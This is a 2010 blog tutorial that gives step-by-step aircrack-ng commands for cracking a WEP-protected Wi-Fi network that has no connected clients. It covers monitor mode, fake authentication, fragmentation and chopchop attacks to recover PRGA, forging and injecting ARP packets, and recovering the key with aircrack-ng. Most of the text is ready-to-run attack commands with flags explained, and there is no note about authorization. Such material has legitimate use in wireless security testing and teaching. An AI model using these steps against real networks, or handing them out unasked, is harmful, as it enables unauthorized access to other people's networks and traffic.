Saturday, February 13, 2010

WEP Crack no wireless clients

There are many times when a wireless network has no wireless clients associated with it and there are no ARP requests coming from the wired side. This tutorial describes how to crack the WEP key when there are no wireless clients and there are no ARP requests coming from the wired side.


If there ARP requests being broadcast from the wire side, then the standard fake authentication combined with ARP request replay technique may be used.



In this tutorial, here is what was used:
Wireless adaptor Alfa AWUS036H
Backtrack 4



Step 1 - Start the wireless interface in monitor mode on AP channel


 airmon-ng start wlan1 9


Step 2 - Use aireplay-ng to do a fake authentication with the access point


 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1

-1 means fake authentication
0 reassociation timing in seconds

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1

6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs
-q 10 - Send keep alive packets every 10 seconds.


Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.

If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and?

tcpdump -n -e -s0 -vvv -i wlan1

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:09:5B:EC:EE:F2) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: ?tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth?. You may need to tweak the phrase ?DeAuth? to pick out the exact packets you want


Step 3 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.

Either chopchop or fragmentation attacks can be to obtain the PRGA bit file. The result is the same so use whichever one works for you.

We will cover the fragmentation technique first. Start another console session and run:

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
-5 means the fragmentation attack

Success! The file ?fragment-0203-180343.xor? can then be used in the next step to generate an arp packet.

If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:

aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
-4 means the chopchop attack

Success! The file ?replay_dec-0201-191706.xor? above can then be used in the next step to generate an arp packet.

Helpful Tips
Be sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsequently generate a packet. The PRGA captured has to equal or greater then the packet length we want to generate.

At home, to generate some packets to force chopchop to start, ping a nonexistent IP on your network using a wired client. This forces an arp to be broadcast and this will show up in chopchop to be used.


Step 4 - Use packetforge-ng to create an arp packet

In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with ?xor?. We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.

But first, lets generate the arp packet for injection by entering:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

-0 means generate an arp packet
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y fragment-0203-180343.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to

The system will respond:

Wrote packet to: arp-request


Step 5 - Start airodump-ng

Open another console session to capture the generated IVs. Then enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture ath0
-c 9 is the channel for the wireless network


Step 6 - Inject the arp packet
Using the console session where you generated the arp packet, enter:

aireplay-ng -2 -r arp-request ath0
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet


Step 7 - Run aircrack-ng to obtain the WEP key

Start another console session and enter:

aircrack-ng -b 00:14:6C:7E:40:80 capture*.cap 
capture*.cap selects all dump files starting with ?capture? and ending in ?cap?.
-b 00:14:6C:7E:40:80 selects the one access point we are interested in

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the ?--ivs? option.

No comments:

Post a Comment